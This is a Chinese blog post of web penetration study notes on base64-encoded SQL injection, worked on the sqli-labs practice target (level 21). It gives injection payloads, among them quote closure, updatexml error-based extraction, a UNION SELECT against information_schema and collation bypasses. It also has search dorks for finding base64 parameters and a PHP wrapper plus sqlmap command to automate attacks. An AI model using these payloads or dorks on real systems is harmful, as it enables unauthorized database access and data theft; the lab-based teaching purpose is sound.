SQL注入之BASE64变形注入

最新推荐文章于 2023-07-21 15:00:00 发布
最新推荐文章于 2023-07-21 15:00:00 发布
阅读量3k 收藏 8
点赞数
分类专栏: web渗透学习笔记 文章标签: SQL注入 base64 变形注入 绕过 测试脚本
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35569814/article/details/100274561
版权

注入简介

什么是base64注入?

base64注入是针对传递的参数被base64加密后的注入点进行注入。除了数据被加密意外,其中注入方式与常规注入一般无二

编码工具选择

在线工具:http://tool.oschina.net/encrypt?type=3

也可以使用burp中自带的编码模块(decoder)

如何发现此漏洞?

在互联网系统中,目前遇到两种base64加密传参方式

第一种,例如id=1,把id=1全部加密处理,得到aWQ9MQ==,直接搜索inurl:?aWQ0

第二种,只处理传参值,得到id=MQ==,搜索inurl:?id=M*=

注入实现

靶场选择

此处继续选用sqlilabs作为测试靶场,第21关,是关于cookie的base64变形注入

漏洞复现

打开靶场所在url,是一个登录界面输入用户名密码,admin/666666,登陆成功,界面如下图

从上图可以看到,系统返回了我们的cookie值,并且进行了编码,这里我们可以使用抓包修改cookie,经过解码,YWRtaW4 =的值是admin,对admin'进行编码,观察页面变化,如下图

尝试闭合原语句,payload:admin')#,如下图

由于这里发生mysql报错,直接尝试报错注入,payload:admin') and updatexml(1,concat(0x7e,database()),1)#,如下图

知识扩展

再继续测试的过程中可能会遇到,提示:Error: Illegal mix of collations for operation 'UNION',这种错误的成因是因为编码的缘故,字符集的编码不同所导致的,要解决就配合convart、using latin1函数来解决。

CONVERT() 函数是把日期转换为新数据类型的通用函数。

大致poyload如下

UNION SELECT 1,2,3,4,5,6,7,convert(Table_Name using latin1) from information_schema.tables Where table_Schema=database()--+

参考文章:https://www.2cto.com/article/201202/121073.html

There are 3 ways to bypass this error:
convert(version() using latin1)
aes_decrypt(aes_encrypt(version(),1),1)
unhex(hex(@@version))
 
Other ways (Thanks to benzi):
cast(version()+as+binary)
convert(version(),binary)
convert(version()+using+binary)

自动化工具

sqlmap

原则上,只要抓包加上–tamper base64encode扩展模块就可以了,未实验

第二个姿势,针对get型,可以尝试写一个demo

命名为test.php,如下

<?php 
$id = base64_encode("id=".$_GET['id']);
echo file_get_contents("http://www.xxxx.com/xxx.php?{$id}");
?>

注意:xxx.php是原网站页面,结下了sqlmap语句可以直接写成

sqlmap-u "http://127.0.0.1/test.php?id=12" -v3

参考文章:https://www.cnblogs.com/xishaonian/p/6370354.html

暂时这些吧

秋水sir
关注
  • 0
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sqlbase64解码、译码
weixin_30830327的博客
03-20 3496
1、5.6版本及之后的版本的base64   主要就是两个MySQL内部函数to_base64和from_base64,使用也很简单,如下:   1)先查看MySQL的版本:mysql> select version(); ----如果超过5.6的版本可以直接使用两个内部函数   2)mysql> select to_base64('helloworld'); ----...
Sql对表字段做base64加解密
weixin_44366140的博客
09-27 1831
Sqlbase64——加密
SQL注入-11】base64注入案例—以Sqli-labs-less22为例(借助BurpSuite工具)
m0_64378913的博客
05-06 2852
目录1 base64注入概述1.1 base64编码基础1.2 base64编码与URL编码1.3 base64注入2 base64注入案例2.1 实验平台2.2 实验过程2.2.1 注入前准备2.2.2 判断注入点及注入类型2.2.3 尝试使用union查询2.2.4 获取库名表名字段名字段内容 1 base64注入概述 1.1 base64编码基础 定义:Base64是网络上最常见的用于传输8Bit字节码的编码方式之一,Base64就是一种基于64个可打印字符来表示二进制数据的方法。 Base
SQL注入检测的各种变形
weixin_30376083的博客
03-27 72
空格的变形:+| %20 | 2个空格| tab | enter | Mysql,MSSQL,ACCESS /**/。 MSSQL 字母的变形:大小写的转换。 Mysql,MSSQL,ACCESS 通过类型转换修饰符N绕过:'1’=N’1 Mysql,MSSQL 通过+号拆解字符串绕过:'abc’='a’%2B’bc’ MSSQL,ACCESS 提交的时候加%: se%l%e%c%t M...
SQL注入base64注入攻击
coderge's CSDN Blog.
09-19 2817
1 base64注入代码分析 在base64注入页面中,程序获取GET参数ID,利用base64_decode ()对参数ID进行base64解码,然后直接将解码后的$id拼接到select语句中进行查询,通过while循环将查询结果输出到页面,代码如下所示。 <?php header("Content-Type:text/html;charset=utf8"); $con=mysqli_connect("localhost","root","qwer","security"); mysqli_
CTF 加密 解密 SQL注入 BASE64
03-19
在网络安全领域,CTF(Capture The Flag)是一种常见的竞赛形式,它涵盖了多种技术挑战,包括但不限于加密、解密、SQL注入以及编码技术如BASE64。在这个场景中,我们将深入探讨这些关键知识点。 首先,加密与解密是...
Web安全之SQL注入攻击
03-04
①这个晨讲我构思了两个星期,但是之前电脑坏了,一直拖...今天由我给大家带来《web安全之SQL注入篇》系列晨讲,首先对课程进行简单介绍,SQL注入篇一共分为三讲:第一讲:“纸上谈兵:我们需要在本地架设注入环境,构
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在 web 应用程序中事先定义好的查询语句的结尾上添加额外的 SQL 语句,在管理员不知情的情况下实现非法...
sqli_labs:Less-12 简要SQL注入-基于报错的变形双引号字符串注入(配合Burp Suite食用更佳)
qq_43660551的博客
10-15 391
1.万能用户名、密码:admin。打开Burp Suite的代理准备抓包。 先登录,点Submit。 到Burp Suite看到抓包成功。 将数据包发送到Repeater,开始注入。 判断列名和字段数的方式与第一关相同,只是在BurpSuite进行。字段数为2。经尝试发现,在提交给数据库查询之前,源代码会自动给用户名和密码加上双引号和括号。 判断数据库名和版本号。 uname=1admin") union select version(),database() #&pass..
SQL注入的几种类型和原理
最新发布
Karka_的博客
07-21 461
老实说,这篇笔记鸽了3个星期左右,有几个原因。漏洞点都要自己进行验证,比较缓慢最近工作上有点忙,下班无心学习我在摸鱼……。笔者学习是比较容易偏离方向,比如DNSlog盲注时抓包发现请求有点不合常理,又跑去找资料看……老实说,这篇笔记鸽了3个星期左右,有几个原因。漏洞点都要自己进行验证,比较缓慢最近工作上有点忙,下班无心学习我在摸鱼……。笔者学习是比较容易偏离方向,比如DNSlog盲注时抓包发现请求有点不合常理,又跑去找资料看……
Sql Server Base64加密解密角本
12-25
非常实用的Base64加密,解密角本。基于UTF8,支持中文加解密。
sqlserver2005的base64加密解密函数
08-03
NULL 博文链接:https://nannan408.iteye.com/blog/1995714
SQL注入绕过的技巧总结
12-14
sql注入在很早很早以前是很常见的一个漏洞。后来随着安全水平的提高,sql注入已经很少能够看到了。但是在,还有很多网站带着sql注入漏洞在运行。稍微有点安全意识的朋友应该懂得要做一下sql注入过滤。   SQL注入绕过技巧有很多,具体的绕过技巧需要看具体的环境,而且很多的绕过方法需要有一个实际的环境,好是你在渗透测试的过程中遇到的环境,否则如果仅仅是自己凭空想,那显然是不靠谱的。这篇文章是总结我在遇到的CTF题目或者是渗透环境的过程中,所使用到的sql注入绕过技巧,这篇文章随着自己的见识和能力不断的提升,所总结的方法也会变多。   一、引号绕过   会使用到引号的地方是在于后的whe
SQL 手工注入 变形上传拿shell
10-21
SQL 手工注入 变形上传拿shell 上传分析
【网络安全】SQL注入--base64注入
边缘拼命划水的小陈
04-07 458
当用户名存入cookie中并且会直接拼接到sql语句中时,可能会存在此漏洞。burpsuite抓取登录信息,为base64编码信息。》两次结果不同故存在sql注入。》经过尝试,字段数目为3。判断编码信息为用户名。
SQL Server Base64编码、解码
stupid_leilei的专栏
03-15 4427
--BASE64编码 CREATE FUNCTION [dbo].[FnBase64Encode](@src varchar(max))   RETURNS VARCHAR(max) as begin   declare @bin varbinary(max)   set @bin=Convert(varbinary(max), @src)   return cast(N'' as xml).value('xs:base64Binary(xs:hexBinary(sql:variable("@bin")).
CTF---Web---SQL注入---09---注入列+sql语句变形
qq_22160557的博客
07-31 430
文章目录前言一、题目描述二、解题步骤1、sql语句变形2、猜测列数3、注入列的选择4、爆表、列、字段三、总结 前言 题目分类: CTF—Web—SQL注入—09—注入列+sql语句变形 一、题目描述 题目:SQL注入 二、解题步骤 1、sql语句变形 Step1: TVE9PQ==是base64编码, 经两次解码后, 答案为数字1. 提示此次手工注入需输入的数据需经过两次base64编码的代码. 2、猜测列数 Step2: 尝试手工注入时, -1 union select 1,2#, 当尝试1,2,3
mysql base64 解码_sqlbase64解码、译码
weixin_39708708的博客
01-27 1032
1、5.6版本及之后的版本的base64主要就是两个MySQL内部函数to_base64和from_base64,使用也很简单,如下:1)先查看MySQL的版本:mysql> select version(); ----如果超过5.6的版本可以直接使用两个内部函数2)mysql> select to_base64('helloworld'); -----加密的过程3)mysq...
SQL 注入漏洞(十三)base64注入
不秃头的程序Yang
06-21 1452
二、代码分析 2、查询敏感信息
网络安全技术13SQL注入.pptx
11-12
网络安全技术13SQL注入.pptx

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值